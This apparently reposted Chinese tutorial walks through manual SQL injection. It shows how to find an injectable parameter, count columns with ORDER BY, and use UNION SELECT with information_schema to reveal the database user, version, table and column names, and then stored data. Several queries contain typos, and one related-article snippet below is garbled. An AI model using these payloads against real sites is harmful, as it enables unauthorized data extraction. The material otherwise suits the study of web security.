SQL

一起聊聊简单的sql手工注入过程

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jan 28, 2022 pm 05:02 PM

sql

本篇文章给大家带来了关于sql中手工注入的相关问题，其中包括判断注入点以及判断注入类型的相关问题，希望对大家有帮助。

一起聊聊简单的sql手工注入过程

判断注入点

1.单引号法：直接在网址后面加一个单引号，如果页面不能正常显示，浏览器返回一些异常信息，则说明该链接可能存在sql注入漏洞

2.1=1和1=2：在网址后面的get传参中加上 and 1=1 ，显示正常，把1=1替换为1=2，显示异常，说明网页存在sql注入。

判断注入类型

1.数字型注入：注入变量的值不需要用引号引起来，如

select * from user where id=$id;

2.字符型注入：注入变量会用引号包裹起来，如`

select * from user where username='$username';`

注入时注意要闭合引号。
3.搜索型注入：

select * from user where username like '%$pass%';

把sql语句构造为

select * from user where username like '%$pass%' union select语句 '%%'；

即传输的变量为 pass%’ union select语句 '% 形成闭合。

判断注入点提交方式

通过抓包等方式判断注入点的提交方式是get,post,还是cookie。

使用order by 查询字段

使用order by 语句可以查询出数据库有多少个字段，可以通过不断的尝试来确定数据库字段数量，如在输入oeder by 9时，页面报错而输入order by 8时页面显示正常，即数据库中有8个字段。
如查询语句为：select * from user where id='$id';
可以构造下面的输入：(id = ') ' order by 3 '+--+
即查询语句为：select * from user where id='' order by 3 '--'

使用联合查询来查询当前数据库、用户、版本信息

使用 union select 语句来查询当前使用用户 user() ，数据库database() ,数据库版本 version() ，服务器操作系统的@@version_compile_os等信息
version版本十分重要，如果版本在5.0以上，就可以使用information_schema库来轻易的查询想要的信息
构造语句：

select * from user where id='' union select user(),database(),version()+--+;

查询当前数据库中的表，列和值

5.0 版本以上的mysql数据库自带的information_schema库中存储着数据库中所有的表名和列明信息。
下面我们就应该根据第五步查询的当前数据库的结果（如数据库为database_1）名下所有的表名tables的信息。
Information_schema.tables ：记录着数据库中所有表名信息的表。
构造的查询语句如下：

Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--

查询的结果为：第五步查询的当前数据库中的表名信息。
Information_schema.columns：记录着数据库中所有的表中的列名信息；
下面就应该根据上面查询得到的表名信息(如表为table_1)查询他的列名信息，构造语句如下：

Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--

查询出列名后，就可以直接通过联合查询查出表中存储的信息（如查出的列名为column_1,column_2）构造语句

Selcet * from user where id='' union select 1,column_1,column_2 from tables;--

即可查询出指定数据库指定表的存储数据

推荐学习：mysql视频教程

以上是一起聊聊简单的sql手工注入过程的详细内容。更多信息请关注PHP中文网其他相关文章！

声明

本文转载于：CSDN。如有侵权，请联系admin@php.cn删除

SQL难以学习吗？揭穿神话May 01, 2025 am 12:07 AM

sqlisnotinerydifficulttolearn.itbecomesmanagablewithpracticeandeseandundestandingofdattartures.startwithbasicselectStatements，useonlineplatformsformsformsformsformsforporractice，work work workwithreaeWithReaTa，LearndataBaseedEndata，LearndataBaseedEndataBaseedEndataBaseedSign，andEggageWithSqummunitesFortort。

MySQL和SQL：它们在数据管理中的角色Apr 30, 2025 am 12:07 AM

MySQL是数据库系统，SQL是操作数据库的语言。1.MySQL存储和管理数据，提供结构化环境。2.SQL用于查询、更新、删除数据，灵活处理各种查询需求。它们协同工作，优化性能和设计是关键。

SQL和MySQL：数据管理初学者指南Apr 29, 2025 am 12:50 AM

SQL和MySQL的区别在于，SQL是用于管理和操作关系数据库的语言，而MySQL是实现这些操作的开源数据库管理系统。1）SQL允许用户定义、操作和查询数据，通过命令如CREATETABLE、INSERT、SELECT等实现。2）MySQL作为RDBMS，支持这些SQL命令，并提供高性能和可靠性。3）SQL的工作原理基于关系代数，MySQL通过查询优化器和索引等机制优化性能。

SQL的核心功能：查询和检索信息Apr 28, 2025 am 12:11 AM

SQL查询的核心功能是通过SELECT语句从数据库中提取、过滤和排序信息。1.基本用法：使用SELECT从表中查询特定列，如SELECTname,departmentFROMemployees。2.高级用法：结合子查询和ORDERBY实现复杂查询，如找出薪水高于平均值的员工并按薪水降序排列。3.调试技巧：检查语法错误，使用小规模数据验证逻辑错误，利用EXPLAIN命令优化性能。4.性能优化：使用索引，避免SELECT*，合理使用子查询和JOIN来提高查询效率。

SQL：数据库的语言解释了Apr 27, 2025 am 12:14 AM

SQL是数据库操作的核心工具，用于查询、操作和管理数据库。1)SQL允许执行CRUD操作，包括数据查询、操作、定义和控制。2)SQL的工作原理包括解析、优化和执行三个步骤。3)基本用法包括创建表、插入、查询、更新和删除数据。4)高级用法涵盖JOIN、子查询和窗口函数。5)常见错误包括语法、逻辑和性能问题，可通过数据库错误信息、检查查询逻辑和使用EXPLAIN命令调试。6)性能优化技巧包括创建索引、避免SELECT*和使用JOIN。

SQL：如何克服学习障碍Apr 26, 2025 am 12:25 AM

要成为SQL高手，应掌握以下策略：1.了解数据库基础概念，如表、行、列、索引。2.学习SQL的核心概念和工作原理，包括解析、优化和执行过程。3.熟练使用基本和高级SQL操作，如CRUD、复杂查询和窗口函数。4.掌握调试技巧，使用EXPLAIN命令优化查询性能。5.通过实践、利用学习资源、重视性能优化和保持好奇心来克服学习挑战。

SQL和数据库：完美的合作伙伴关系Apr 25, 2025 am 12:04 AM

SQL与数据库的关系是紧密结合的，SQL是管理和操作数据库的工具。1.SQL是一种声明式语言，用于数据定义、操作、查询和控制。2.数据库引擎解析SQL语句并执行查询计划。3.基本用法包括创建表、插入和查询数据。4.高级用法涉及复杂查询和子查询。5.常见错误包括语法、逻辑和性能问题，可通过语法检查和EXPLAIN命令调试。6.优化技巧包括使用索引、避免全表扫描和优化查询。